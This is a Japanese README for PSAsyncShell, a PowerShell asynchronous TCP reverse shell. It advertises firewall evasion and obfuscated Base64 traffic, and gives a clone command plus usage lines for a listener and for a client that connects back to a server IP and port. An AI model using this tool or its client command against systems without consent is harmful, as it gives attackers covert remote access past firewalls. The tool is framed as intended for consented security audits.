
純粋なPowerShellで書かれた非同期TCPリバースシェルです。非ブロッキングI/Oによりファイアウォールを回避し、コマンド履歴、ファイルのアップロード/ダウンロード、難読化されたBase64トラフィックを備えています。

PSAsyncShellは、非同期TCPリバースシェルであり、純粋なPowerShellで書かれています。
他のリバースシェルとは異なり、すべての通信と実行フローは非同期で行われるため、一部のファイアウォールや、この種のリモート接続に対する対策を回避できます。
さらに、このツールはコマンド履歴、画面消去、ファイルのアップロードとダウンロード、チャンク分割による情報送信、およびリバースBase64 URLエンコードと難読化されたトラフィックを備えています。
リポジトリ全体をクローンするか、zipファイルをダウンロードすることを推奨します。 以下のコマンドを実行して行えます。
git clone https://github.com/JoelGMSec/PSAsyncShell
.\PSAsyncShell.ps1 -h
____ ____ _ ____ _ _ _
| _ \/ ___| / \ ___ _ _ _ __ ___/ ___|| |__ ___| | |
| |_) \___ \ / _ \ / __| | | | '_ \ / __\___ \| '_ \ / _ \ | |
| __/ ___) / ___ \\__ \ |_| | | | | (__ ___) | | | | __/ | |
|_| |____/_/ \_\___/\__, |_| |_|\___|____/|_| |_|\___|_|_|
|___/
---------------------- by @JoelGMSec -----------------------
Info: This tool helps you to get a remote shell
over asynchronous TCP to bypass firewalls
Usage: .\PSAsyncShell.ps1 -s -p listen_port
Listen for a new connection from the client
.\PSAsyncShell.ps1 -c server_ip server_port
Connect the client to a PSAsyncShell server
Warning: All data will be sent unencrypted
Upload function doesn't use MultiPart
https://darkbyte.net/psasyncshell-bypasseando-firewalls-con-una-shell-tcp-asincrona
このプロジェクトはGNU 3.0ライセンスの下でライセンスされています。詳細はLICENSEファイルを参照してください。
このツールはJoel Gámez Molina(@JoelGMSec)によって一から作成・設計されました。
本ソフトウェアは一切の保証を提供しません。その使用は教育環境および/またはクライアントの適切な同意を得たセキュリティ監査に限定されます。私はその誤用またはそれによって引き起こされる可能性のある損害について一切の責任を負いません。
詳細については、Twitter(@JoelGMSec)またはブログ(darkbyte.net)で見つけることができます。
私の活動を支援するには、コーヒーを一杯ごちそうしてください: